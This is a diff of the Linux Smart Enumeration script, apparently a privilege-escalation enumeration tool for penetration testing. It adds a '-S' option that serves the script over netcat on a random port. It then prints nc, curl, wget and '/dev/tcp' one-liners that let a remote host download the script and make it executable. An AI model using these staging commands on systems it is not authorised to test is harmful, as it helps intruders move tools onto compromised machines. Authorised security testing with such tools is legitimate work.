  • ■ ■ ■ ■ ■ ■
    skipped 298 lines
    299 299   echo " to do faster scans at the cost of completeness"
    300 300   echo " -p SECONDS Time that the process monitor will spend watching for"
    301 301   echo " processes. A value of 0 will disable any watch (default: 60)"
     302 + echo " -S Serve the lse.sh script in this host so it can be retrieved"
     303 + echo " from a remote host."
    302 304  }
    303 305  lse_ask() {
    304 306   local question="$1"
    skipped 138 lines
    443 445   fi
    444 446   cecho "${lblue}Architecture:${reset} $lse_arch\n"
    445 447   echo
     448 +}
     449 +lse_serve() {
     450 + # get port
     451 + which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
     452 + 
     453 + local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`"
     454 + 
     455 + # Get a valid and non used port
     456 + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
     457 + port_valid=true
     458 + while true; do
     459 + for ip in $local_ips; do
     460 + nc -z "$ip" "$port" && port_valid=false
     461 + done
     462 + if [ $((port)) -lt 1024 ] || [ $((port)) -gt 65500 ]; then
     463 + port_valid=false
     464 + fi
     465 + $port_valid && break
     466 + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
     467 + done
     468 + 
     469 + echo
     470 + cecho " Serving ${white}Linux Smart Enumeration${reset} on port ${blue}$port${reset}.\n"
     471 + echo
     472 + cecho " Depending on your IP and available tools, some of these commands should download it in a remote host:\n"
     473 + for ip in $local_ips; do
     474 + [ "$ip" = "" ] && continue
     475 + echo
     476 + cecho "${reset} [${blue}$ip${reset}]\n"
     477 + cecho "${green} * ${white}nc ${reset} $ip $port > lse.sh </dev/null; chmod 755 lse.sh\n"
     478 + cecho "${green} * ${white}curl ${reset}--http0.9 '$ip:$port' -o lse.sh; chmod 755 lse.sh\n"
     479 + cecho "${green} * ${white}wget ${reset} '$ip:$port' -O lse.sh; chmod 755 lse.sh\n"
     480 + cecho "${green} * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n"
     481 + done
     482 + nc -l -q0 -p "$port" < "$0" >/dev/null
    446 483  }
    447 484  lse_header() {
    448 485   local id="$1"
    skipped 810 lines
    1259 1296  ##)
    1260 1297   
    1261 1298  #( Main
    1262  -while getopts "hcil:e:p:s:" option; do
     1299 +while getopts "hcil:e:p:s:S" option; do
    1263 1300   case "${option}" in
    1264 1301   c) lse_color=false; lse_grep_opts='--color=never';;
    1265 1302   e) lse_exclude_paths "${OPTARG}";;
    skipped 1 lines
    1267 1304   l) lse_set_level "${OPTARG}";;
    1268 1305   s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";;
    1269 1306   p) lse_proc_time="${OPTARG}";;
     1307 + S) lse_serve; exit $?;;
    1270 1308   h) lse_help; exit 0;;
    1271 1309   *) lse_help; exit 1;;
    1272 1310   esac
    skipped 27 lines
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